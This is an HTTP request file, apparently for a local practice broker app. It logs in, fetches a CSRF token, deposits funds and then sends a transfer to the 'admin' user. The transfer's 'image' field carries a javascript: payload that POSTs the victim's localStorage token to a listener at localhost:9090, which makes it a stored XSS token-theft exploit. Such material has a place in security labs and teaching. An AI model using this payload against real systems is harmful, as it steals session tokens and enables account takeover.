### 
@baseurl = http://localhost:8080/api

### Login

# @name loginRequest

POST {{baseurl}}/auth/login
Content-Type: application/json

{
    "username": "user",
    "password": "password"
}

###
@access_token = {{loginRequest.response.body.$.access_token}}
@refresh_token = {{loginRequest.response.body.$.refresh_token}}

### Get CSRF token

# @name csrfRequest

GET {{baseurl}}/broker/csrf
Authorization: Bearer {{access_token}}

### Deposit some money

# @name depositRequest

POST {{baseurl}}/broker/deposit
Authorization: Bearer {{access_token}}
Content-Type: application/json

{
    "amount": 100
}

### Send transfer

# @name transferRequest

POST {{baseurl}}/broker/transfer
Authorization: Bearer {{access_token}}
Content-Type: application/json

{
    "peer": "admin",
    "amount": 1,
    "image": "javascript:fetch('http://localhost:9090/log',{method:'POST',body:localStorage.getItem('token')});",
    "csrf": "{{csrfRequest.response.body.$.csrf}}"
}